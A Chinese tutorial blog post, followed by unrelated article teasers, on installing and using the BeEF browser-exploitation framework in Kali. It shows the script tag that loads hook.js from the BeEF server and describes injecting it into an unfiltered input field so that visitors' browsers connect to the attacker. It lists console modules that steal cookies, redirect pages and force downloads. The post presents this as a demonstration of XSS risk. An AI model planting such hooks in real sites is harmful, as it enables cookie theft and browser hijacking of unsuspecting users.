叁滴水

【安全系列】beef-xss攻击示例

beef-xss说明

BeEF是“浏览器开发框架”的缩写。它是一个专注于Web浏览器的渗透测试工具。
BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同，BeEF超越了硬化的网络边界和客户端系统，并在一个门户开放的环境中检查可利用性：Web浏览器。BeEF将钩挂一个或多个Web浏览器，并将其用作启动定向命令模块的滩头堡，并从浏览器上下文中对系统进行进一步攻击。

1.安装beef-xss

apt-get install beef-xss

Setting up ruby-http-parser (1.2.1-3) …
Setting up ruby-http-cookie (1.0.3-1) …
Setting up ruby-rest-client (2.0.2-3.1) …
Setting up ruby-rushover (0.3.0-2) …
Setting up ruby-execjs (2.6.0-1) …
Setting up ruby-http (4.4.1-4) …
Setting up ruby-mojo-magick (0.5.6-2) …
Setting up imagemagick (8:6.9.10.23+dfsg-2.1+b2) …
Setting up ruby-uglifier (2.7.2+dfsg-2) …
Setting up ruby-qr4r (0.4.1-1) …
Setting up ruby-twitter (7.0.0-1) …
Setting up beef-xss (0.5.0.0+git20191218-0kali2) …
beef-xss.service is a disabled or a static unit, not starting it.
Processing triggers for kali-menu (2020.1.7) …
Processing triggers for desktop-file-utils (0.24-1) …
Processing triggers for mime-support (3.64) …
Processing triggers for initramfs-tools (0.135+kali1) …
update-initramfs: Generating /boot/initrd.img-5.4.0-kali3-amd64
Processing triggers for hicolor-icon-theme (0.17-2) …
Processing triggers for libc-bin (2.29-9) …
Processing triggers for systemd (244-3) …
Processing triggers for man-db (2.9.0-2) …
Processing triggers for fontconfig (2.13.1-2+b1) …

控制台有如上信息说明安装成功

beef-xss基本使用

1.启动beef-xss

root@kali:/usr/share# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2020-08-09 03:30:52 EDT; 5s ago
   Main PID: 11463 (ruby)
      Tasks: 2 (limit: 2333)
     Memory: 49.8M
     CGroup: /system.slice/beef-xss.service
             └─11463 ruby /usr/share/beef-xss/beef

Aug 09 03:30:52 kali systemd[1]: Started beef-xss.
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

有如上信息，说明启动成功。通过浏览器输入http://127.0.0.1:3000/ui/panel，即可访问，在启动时会让设置beef账号的密码。到这里说明成功启动。

那么如何判断页面有xss攻击点呢？如下是一个简单的页面，没有做xss的防御的页面。文本框中没有做任何的过滤。在文本框中输入">如果js成功执行，出现弹框，说明可以进行xss攻击。

这时在文本框中输入注意ip，我这里是本地测试，所以是自己的ip。如果入库成功。则在列表页面的时候会成功触发该js，然后去请求hook.js。如下所示。

然后这个时候beef控制台会有机器上线。控制台说明

Hocked Browers
- online browers 在线浏览器
- offline browers 离线浏览器
Detials
- 浏览器、插件版本信息，操作系统信息
Logs
- 浏览器动作：焦点变化，鼠标单击，信息输入
commands
- 绿色模块：表示模块适用当前用户，并且执行结果对用户不可见
- 红色模块：表示模块不适用当前用户，有些红色模块也可以执行
- 橙色模块：模块可用，但结果对用户可见
- 灰色模块：模块为在目标浏览器上测试过

2.简单测试

2.1给目标发一个弹框

2.2可输入的弹框

2.3跳转页面

2.4播放一个音乐

2.5获取目标cookie

2.6让目标下载一个文件

当然还有更多强大的功能有网络扫描，地址位置获取等等，这里就不再介绍了，总的就是想表达xss的危险性。在开发的过程中也要对此进行一定防范。

参考地址：beef-xss官方说明

读到这里了，如果对你有帮助就留个赞吧。

另外关注公众号java内功心法回复我要当架构即可领取java方向必备进阶资料。

你可能感兴趣的:(安全系列,beef,xss)

玩转大模型的第一步——提示词(Prompt)工程【抛砖篇】 AI大模型老林 prompt 数据挖掘机器学习 opencv 语音识别人工智能
前言AI大模型提示词工程，又名LLMpromptsProject，指的是在使用大型语言模型（如OpenAI的GPT系列）时，用于引导模型生成特定响应的输入，是在使用AI大模型过程中非常重要的一个环节，是模型生成文本的起点。选择合适的Prompt对大模型回答的质量影响非常大，甚至可能会导致截然不同的结果。Prompt编写框架我们可以简单的看一下，分别使用下面两个Prompt在LLM的输出中分别会得到
C++ unordered_map 我要满血复活 c++开发语言
1.unordered系列关联式容器在C++98中，STL提供了底层为红黑树结构的一系列关联式容器，在查询时效率可达到，即最差情况下需要比较红黑树的高度次，当树中的节点非常多时，查询效率也不理想。最好的查询是，进行很少的比较次数就能够将元素找到，因此在C++11中，STL又提供了4个unordered系列的关联式容器，这四个容器与红黑树结构的关联式容器使用方式基本类似，只是其底层结构不同,该系列容
天童教育：怎样建立稳固的亲子关系消息快传其他
在孩子成长的岁月里，稳固的亲子关系宛如温暖的港湾，为孩子遮风挡雨，给予他们心灵的慰藉和安全感。哈尔滨天童教育相信，良好的亲子关系不仅能让孩子感受到爱与关怀，更是孩子健康成长、人格塑造的重要基石。然而，在现实生活中，许多因素可能会阻碍亲子关系的建立。比如，家长因工作繁忙，陪伴孩子的时间太少，使得孩子与家长之间渐渐产生距离感。又或者，当孩子表达自己的想法时，家长没有耐心倾听，甚至直接否定，这也会让孩子
【Postgres】postgresql系列之数据类型 zkq_1986 数据库
一、数字数据类型1.1数字类型列表：类型名称存储长度描述范围smallint2bytes小范围整数类型-32768to+32767integer4bytes整数类型-2147483648to+2147483647bigint8bytes大范围数据类型-9223372036854775808to9223372036854775807decimal可变用户指定精度upto131072digitsbef
渗透测试术语--必要基础大象只为你跟我学网安知识网络安全
一、前言了解和记住渗透测试术语是网络安全技术人员必要的基础，能帮助我们有效沟通和合作、全面理解渗透测试流程、设计和规划渗透测试活动、安全漏洞识别和利用和规避法律和道德风险。我整理一部分术语，自己归为8个分类方便记忆。共整理了56个术语，每个术语都有简要的含义解释。二、渗透测试术语1、攻击介质1.1、漏洞硬件、软件、协议的缺陷，可以通过未授权的方式访问、破坏系统。1.2、木马获取用户权限的程序或者代
可选链语法在javascript和typescript中的使用详解上趣工作室 javascript javascript typescript 开发语言
可选链（OptionalChaining）在JavaScript和TypeScript中的使用非常相似。以下是一个详细的使用案例，包括解释和示例代码。使用案例假设我们有一个用户对象，包含用户的个人信息和地址信息。我们希望安全地访问用户的地址信息，特别是当某些属性可能不存在时。示例对象constuser={name:"Alice",address:{street:"123MainSt",city:"
【MySQL】Mysql数据库导入导出sql文件、备份数据库、迁移数据库程序员洲洲数据库数据库 mysql 导入导出sql sql文件备份迁移
本文摘要：本文提出了xxx的实用开发小技巧。作者介绍：我是程序员洲洲，一个热爱写作的非著名程序员。CSDN全栈优质领域创作者、华为云博客社区云享专家、阿里云博客社区专家博主。同时欢迎大家关注其他专栏，我将分享Web前后端开发、人工智能、机器学习、深度学习从0到1系列文章。同时洲洲已经建立了程序员技术交流群，如果您感兴趣，可以私信我加入我的社群，也可以直接vx联系（文末有名片）v：bdizztt随时
Oracle系列---【ORA-01017用户名密码无效】少年攻城狮 oracle 数据库
1.问题项目启动时，报：ORA-01017用户名密码不对的错误，但是没有报具体哪个库错误，因为我是多数据源的项目。2.解决方案2.1定位到连接数据报错的用户和库名select*fromdba_audit_sessionwhereACTION_NAME='LOGON'ANDRETURNCODE=1017ORDERBYTIMESTAMPDESC;1.OS_USERNAME-客户端操作系统登录用户名,2
Oracle系列---【Smallfile模式的表空间如何确定单个数据文件的最大大小？】少年攻城狮 oracle 数据库
如果你的数据版本是oracle12c以上的版本，直接跳到最下面执行5.1和5.4即可。在Oracle数据库中，MAXSIZE参数用于限制数据文件的最大大小，确保表空间不会无限制增长。MAXSIZE的最大值主要受到以下因素的影响：1.操作系统的文件系统限制不同的操作系统和文件系统有不同的单个文件大小限制。例如：ext4文件系统(Linux)：单个文件最大支持16TB。NTFS文件系统(Windows
Java 中可作为 GC Roots 的对象有哪几种？码炫课堂-码哥 java面试题 jvm 面试
作者简介：大家好，我是码炫码哥，前中兴通讯、美团架构师，现任某互联网公司CTO，兼职码炫课堂主讲源码系列专题代表作：《jdk源码&多线程&高并发》，《深入tomcat源码解析》，《深入netty源码解析》，《深入dubbo源码解析》，《深入springboot源码解析》，《深入spring源码解析》，《深入redis源码解析》等联系qq：184480602，加我进群，大家一起学习，一起进步，一起对
Magnet Player：一款基于Web的磁力链媒体播放器 rgrgrwfe 前端
MagnetPlayer：一款基于Web的磁力链媒体播放器项目地址:https://gitcode.com/gh_mirrors/ma/magnet-player是一个创新的开源项目，它允许用户直接在浏览器中播放磁力链（MagnetURI）内容，无需下载或安装任何桌面应用程序。这个项目的独特之处在于它结合了现代Web技术，为用户提供了便捷、安全且跨平台的在线媒体播放体验。技术分析WebTorren
Java全栈项目 - 农产品溯源管理系统开发实践天天进步2015 Java项目实战 java 开发语言
一、项目介绍农产品溯源管理系统是一个基于Java全栈技术开发的现代化信息系统，旨在实现农产品从种植、生产到销售的全过程追踪管理。本系统帮助提高农产品质量安全监管效率，保障食品安全。二、技术架构后端技术栈：SpringBoot2.5.xSpringSecurityMyBatisPlusMySQL8.0RedisJWT认证前端技术栈：Vue.js3.0ElementPlusAxiosEchartsVu
JavaScript 操作符与表达式布兰妮甜 #JavaScript 基础 javascript 操作符表达式箭头函数前端开发
Hi,我是布兰妮甜，编写流畅、愉悦用户体验的程序员。JavaScript是一种功能强大且灵活的编程语言，广泛应用于前端和后端开发。它提供了一系列丰富的操作符和表达式来处理数据、执行逻辑判断以及控制程序流程。理解这些概念对于编写高效、可读性强的代码至关重要。下面将详细探讨JavaScript中的操作符与表达式。文章目录一、操作符（Operators）二、表达式（Expressions）三、总结一、操
【AI Agent系列】【MetaGPT多智能体学习】1. 再理解 AI Agent - 经典案例和热门框架综述同学小张大模型人工智能学习 gpt 笔记 MetaGPT agi 智能体
本系列文章跟随《MetaGPT多智能体课程》（https://github.com/datawhalechina/hugging-multi-agent），深入理解并实践多智能体系统的开发。本文为该课程的第二章（智能体综述及多智能体框架介绍)笔记）。文章目录0.温故而知新-再看AIAgent是什么1.一个AIAgent实例介绍-BabyAGI2.多智能体框架比较3.警告？0.温故而知新-再看AIA
MySQL 进阶：运维与架构 - 从链式复制到主从复制墨夶数据库学习资料1 mysql 运维架构
MySQL进阶：运维与架构-从链式复制到主从复制在MySQL数据库的高可用性和扩展性架构中，链式复制提供了一种灵活的方式来扩展复制拓扑结构。然而，在某些情况下，你可能需要将复杂的链式复制架构简化为主从复制架构，例如为了减少延迟、简化管理或者应对特定的安全要求。本文将详细介绍如何从链式复制架构转换回主从复制架构，并提供相应的操作步骤和注意事项。❓引言：为什么从链式复制回到主从复制❓尽管链式复制提供了
【商城系统技术选型】启山智软商城源码微信小程序小程序 java
商城系统技术选型是一个复杂但至关重要的过程，它直接关系到商城系统的性能、可扩展性、安全性以及用户体验等多个方面。以下是一些关键的技术选型考虑因素：前端技术选型框架选择：React或Vue.js等流行前端框架是不错的选择，它们具有良好的可组件化和可重用性，且社区资源丰富，有大量的插件和工具可供使用，能提高开发效率和界面的交互性。响应式设计：确保系统能自适应不同设备屏幕，如手机、平板、电脑等，提供一致
深入了解WAF防火墙及其在中国的发展现状兴风键盘侠安全防护网络系统安全安全
随着网络安全威胁的不断升级，网络应用防护成为企业信息安全的重要组成部分。WAF（WebApplicationFirewall，Web应用防火墙）正是应对这一挑战的关键工具之一。本文将详细介绍WAF防火墙的概念、功能、技术特点，以及其在中国市场的现状与未来发展趋势。一、什么是WAF防火墙？WAF（WebApplicationFirewall，Web应用防火墙）是一种专门保护Web应用的安全设备或服务
深入了解WAF防火墙及其在中国的发展现状兴风键盘侠服务器管理网络系统安全安全
随着网络安全威胁的不断升级，网络应用防护成为企业信息安全的重要组成部分。WAF（WebApplicationFirewall，Web应用防火墙）正是应对这一挑战的关键工具之一。本文将详细介绍WAF防火墙的概念、功能、技术特点，以及其在中国市场的现状与未来发展趋势。一、什么是WAF防火墙？WAF（WebApplicationFirewall，Web应用防火墙）是一种专门保护Web应用的安全设备或服务
前端建议玩node？？？ web网站装修工前端 javascript vue.js 前端框架 node.js 后端
想搞个小项目玩玩顺便挣点零花钱，那node是最简单和方便的。我就发现一个node+vue后台管理比较实用，可以直接那来用。直通车：vue+node源码https://gitee.com/MMinter/vue_node核心功能模块用户管理用户信息维护：管理员可以创建、更新和删除用户账户。用户状态控制：包括激活或禁用用户账户，确保安全性和合规性。角色管理角色创建与分配：根据业务需求创建不同的角色，并
【第一篇】SpringSecurity的入门筱白爱学习 java springsecurity
1.SpringSecurity概念 SpringSecurity是Spring采用AOP思想，基于servlet过滤器实现的安全框架。它提供了完善的认证机制和方法级的授权功能。是一款非常优秀的权限管理框架。 SpringSecurity是一个功能强大且高度可定制的身份验证和访问控制框架。它是用于保护基于Spring的应用程序的事实上的标准。 SpringSecurity是一个框架，致力于为
MySQL学习笔记11：limit 分页查询 AsajuHuishi MySQL mysql 数据库
简介本系列（MySQL学习笔记）是我基于B站上SQL播放量第一的MySQL基础+高级篇-数据库-sql-尚硅谷视频所做的笔记，方便大家学习和掌握MySQL。说明1.这个系列基本包含了视频中老师讲课的所有内容，包括知识点、案例、部分测试题。2.所需的配套资料（来自B站评论区）@黎曼的猜想：配套资料下载–>公众号公众号DragonWell回复：mysql注意：是公众号！！是公众号！！是公众号，点那个搜
面试题-SpringBoot 程序员
概述说说SpringBoot和Spring的关系springboot我理解就是把springspringmvcspringdatajpa等等的一些常用的常用的基础框架组合起来，提供默认的配置，然后提供可插拔的设计，就是各种starter，来方便开发者使用这一系列的技术，套用官方的一句话，spring家族发展到今天，已经很庞大了，作为一个开发者，如果想要使用spring家族一系列的技术，需要一个一个
二叉树算法 JAVA 爱掉发的小龙 java 开发语言前端后端 python
二叉树是一种常用的数据结构，它由一系列的节点组成，每个节点最多有两个子节点，分别称为左子节点和右子节点。在Java中，我们可以通过定义一个二叉树的节点类来实现二叉树算法。一个典型的二叉树节点类如下所示：classNode{intval;Nodeleft;Noderight;publicNode(intval){this.val=val;this.left=null;this.right=null;
具体毕设方案100例之第4例STM32智能家居烟雾温度火灾防盗报警系统设计版本4 李学长单片机毕设单片机毕设具体方案课程设计 stm32 智能家居单片机毕业设计嵌入式硬件 51单片机
LCD1602液晶显示：实时展现当前检测到的烟雾浓度值，为用户提供直观的视觉信息。按键设置报警上限：用户可通过简单操作按键，自定义烟雾浓度的报警阈值，以满足不同场景的安全需求。蜂鸣器报警：当烟雾浓度超过用户设定的报警值时，蜂鸣器将立即启动，发出声音报警，提醒用户注意安全。无线WiFi传输：通过集成的ESP8266无线WiFi模块，将烟雾浓度数据实时传输至用户手机端，实现远程监控与数据查看。继电器模
Elasticsearch 8.x 重要变化（qbit）
前言本文记录的重要变化重要与否为qbit个人判断官方Releasenotes：https://www.elastic.co/guide/en/elasticsearch/reference/curre...收费功能查看：ElasticStacksubscriptions回顾：向量搜索创新的时间线8.0(2022-02-11)What’snewin8.0默认启用安全特性（Securityfeatur
学习笔记040——如何定时备份服务器中的数据库？上下求索. MySQL Linux mysql 服务器
目录1、编写备份脚本：2、创建crontab定时任务需求前景：Ubuntu系统的服务器中，需要定时备份MySQL数据库中的数据。确保数据能够得到安全保障。我的方法：1、写一个备份数据库的脚本2、利用Ubuntu的crontab每日定时执行脚本。下面是我的实现方式：1、编写备份脚本：#!/bin/bash#设置数据库名，用户和密码DB_NAME="数据库名"DB_USER="账号"DB_PASSWO
【Python】已解决：WARNING: pip is configured with locations that require TLS/SSL, however the ssl module i 屿小夏 python pip ssl
个人简介：某不知名博主，致力于全栈领域的优质博客分享|用最优质的内容带来最舒适的阅读体验！文末获取免费IT学习资料！文末获取更多信息精彩专栏推荐订阅收藏专栏系列直达链接相关介绍书籍分享点我跳转书籍作为获取知识的重要途径，对于IT从业者来说更是不可或缺的资源。不定期更新IT图书，并在评论区抽取随机粉丝，书籍免费包邮到家AI前沿点我跳转探讨人工智能技术领域的最新发展和创新，涵盖机器学习、深度学习、自然
Electron 开发者的 Tauri 2.0 实战指南：安全实践技术出海录人工智能前端 React
在桌面应用开发中，安全性至关重要。相比Electron，Tauri2.0提供了更严格的安全模型和更完善的权限系统。本文将帮助你理解和实践Tauri的安全特性。权限系统对比Electron的安全模型在Electron中，我们通常这样处理安全：//main.jsconst{app,BrowserWindow}=require('electron')functioncreateWindow(){cons
深入理解 Windows Server 的核心功能：现代 IT 架构的基石 Echo_Wish 让你快速入坑运维运维探秘 windows 架构
深入理解WindowsServer的核心功能：现代IT架构的基石在现代IT基础架构中，WindowsServer一直扮演着不可或缺的角色。它不仅是一个强大的服务器操作系统，更是企业级解决方案的核心支柱。从中小型企业到跨国公司，WindowsServer提供了从身份管理到高可用性的一系列功能，帮助组织应对复杂的IT挑战。作为一名运维人员或IT架构师，理解其核心功能对于设计高效、安全、可扩展的IT环境
Java在云计算中的应用：Java的秘密云基地五行星辰偷偷的学Java java 云计算开发语言
Java在云计算领域的应用非常广泛，它以其跨平台性、强大的生态系统和安全性成为了构建云服务的重要工具。以下是Java在云计算中的一些关键应用和优势：1.微服务架构Java特别是SpringBoot框架，为开发微服务提供了强大支持。通过微服务架构，Java应用可以轻松创建独立、自包含的服务，这些服务可以被部署在云环境中，实现快速扩展和灵活管理。实践案例分析：基于Java的微服务电商平台：使用Spri
JAVA中的Enum 周凡杨 java enum 枚举
Enum是计算机编程语言中的一种数据类型---枚举类型。在实际问题中，有些变量的取值被限定在一个有限的范围内。例如，一个星期内只有七天我们通常这样实现上面的定义： public String monday; public String tuesday; public String wensday; public String thursday
赶集网mysql开发36条军规 Bill_chen mysql 业务架构设计 mysql调优 mysql性能优化
(一)核心军规 (1)不在数据库做运算 cpu计算务必移至业务层； (2)控制单表数据量 int型不超过1000w，含char则不超过500w；合理分表；限制单库表数量在300以内； (3)控制列数量字段少而精，字段数建议在20以内
Shell test命令 daizj shell 字符串 test 数字文件比较
Shell test命令 Shell中的 test 命令用于检查某个条件是否成立，它可以进行数值、字符和文件三个方面的测试。数值测试参数说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真实例演示： num1=100 num2=100if test $[num1]
XFire框架实现WebService(二) 周凡杨 java webservice
有了XFire框架实现WebService(一)，就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程)：两个java bean类： Course.java package cn.com.bean; public class Course { private
重绘之画图板朱辉辉33 画图板
上次博客讲的五子棋重绘比较简单，因为只要在重写系统重绘方法paint（）时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。画图板重绘难在需要重绘的类型很多，比如说里面有矩形，园，直线之类的，所以我们要想办法将里面的图形加入一个队列中，这样在重绘时就
Java的IO流西蜀石兰 java
刚学Java的IO流时，被各种inputStream流弄的很迷糊，看老罗视频时说想象成插在文件上的一根管道，当初听时觉得自己很明白，可到自己用时，有不知道怎么代码了。。。每当遇到这种问题时，我习惯性的从头开始理逻辑，会问自己一些很简单的问题，把这些简单的问题想明白了，再看代码时才不会迷糊。 IO流作用是什么？答：实现对文件的读写，这里的文件是广义的； Java如何实现程序到文件
No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match! 网上找了好多的资料没能解决，后来发现：项目中使用的是xml配置的方式配置事务，但是
Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
原文：http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large 异常信息： Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
JS 格式化时间 alxw4616 JavaScript
/** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
队列中数据的移除问题百合不是茶队列移除
队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除, 代码如下; // package com.Thread0715.com; import java.util.ArrayList; public class Threa
Runnable接口使用实例 bijian1013 java thread Runnable java多线程
Runnable接口 a. 该接口只有一个方法：public void run(); b. 实现该接口的类必须覆盖该run方法 c. 实现了Runnable接口的类并不具有任何天
oracle里的extend详解 bijian1013 oracle 数据库 extend
扩展已知的数组空间，例： DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素，大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
【httpclient】httpclient发送表单POST请求 bit1129 httpclient
浏览器Form Post请求浏览器可以通过提交表单的方式向服务器发起POST请求，这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求，将请求数据放置于请求体中，服务器端以二进制流的方式读取数据，HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求，比如请求数据是字符串或者是二进制数据 2. Form
【Hive十三】Hive读写Avro格式的数据 bit1129 hive
1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype 2. 创建avro格式的数据表 hive> CREATE TABLE avro_table(age INT, name STRING)STORE
nginx+lua+redis自动识别封解禁频繁访问IP ronin47
在站点遇到攻击且无明显攻击特征，造成站点访问慢，nginx不断返回502等错误时，可利用nginx+lua+redis实现在指定的时间段内，若单IP的请求量达到指定的数量后对该IP进行封禁，nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在指定的封禁时间后实行自动解封的目的。一、安装环境： CentOS x64 release 6.4(Fin
java-二叉树的遍历-先序、中序、后序（递归和非递归）、层次遍历 bylijinnan java
import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan java spring IOC
以FileSystemXmlApplicationContext为例，把Spring IoC容器的初始化流程走一遍： ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
[科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
军事科研工程和项目并非要用最先进，最时髦的技术，而是要做到“万无一失” 而民营科技企业在搞科技创新工程的时候，往往考虑的是技术的先进性，而对先进技术带来的风险考虑得不够，在今天提倡军民融合发展的大环境下，这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前，对
spring 定时器-两种方式 cuityang spring quartz 定时器
方式一：间隔一定时间运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
简述一下关于BroadView站点的相关设计 damoqiongqiu view
终于弄上线了，累趴，戳这里http://www.broadview.com.cn 简述一下相关的技术点前端：jQuery+BootStrap3.2+HandleBars，全站Ajax（貌似对SEO的影响很大啊！怎么破？），用Grunt对全部JS做了压缩处理，对部分JS和CSS做了合并（模块间存在很多依赖，全部合并比较繁琐，待完善）。后端：U
运维 PHP问题汇总 dcj3sjt126com windows2003
1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页解决方法：后台>系统>系统基本参数>核心设置>关键字替换（是/否），这里选择“是”。后台>系统>系统基本参数>其他选项>自动提取关键字，这里选择“是”。 2、解决PHP168超级管理员上传图片提示你的空间不足网站是用PHP168做的，反映使用管理员在后台无法
mac 下安装php扩展 - mcrypt dcj3sjt126com PHP
MCrypt是一个功能强大的加密算法扩展库，它包括有22种算法，phpMyAdmin依赖这个PHP扩展，具体如下：下载并解压libmcrypt-2.5.8.tar.gz。在终端执行如下命令： tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
MongoDB更新文档 [四] eksliang mongodb Mongodb更新文档
MongoDB更新文档转载请出自出处：http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD，前面的博客简单介绍了，但是对文档更新篇幅比较大，所以这里单独拿出来。语法结构如下： db.collection.update( criteria, objNew, upsert, multi) 参数含义参数
Linux下的解压，移除，复制，查看tomcat命令 y806839048 tomcat
重复myeclipse生成webservice有问题删除以前的，干净 1、先切换到：cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。有问题不明的先注掉 cp /opt/tomcat-6.0.44/webapps/g
Spring之使用事务缘由(3-XML实现) ihuning spring
用事务通知声明式地管理事务事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理，可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知，为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后，就需要将它与切入点关联起来。由于事务通知是在 <aop:
GCD使用经验与技巧浅谈啸笑天 GC
前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”，本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量这一条算是“老生常谈”了，但我认为还是有必要强调一次，毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug，正确的如下： 1
linux（Ubuntu）下常用命令备忘录1 macroli linux 工作 ubuntu
在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表：ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容，但这样直接运行所得到的信息也是比较少的，通常它可以结合以下这些参数运行以查询更多的信息： ls / 显示/.下的所有文件和目录 ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件，包括隐藏文
nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点 mysql nodejs
// db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
一起学Hive系列文章 superlxw1234 hive Hive入门
[一起学Hive]系列文章目录贴，入门Hive，持续更新中。 [一起学Hive]之一—Hive概述，Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
Spring开发利器：Spring Tool Suite 3.7.0 发布 wiselyman spring
Spring Tool Suite(简称STS)是基于Eclipse，专门针对Spring开发者提供大量的便捷功能的优秀开发工具。在3.7.0版本主要做了如下的更新：将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者，推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示，

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他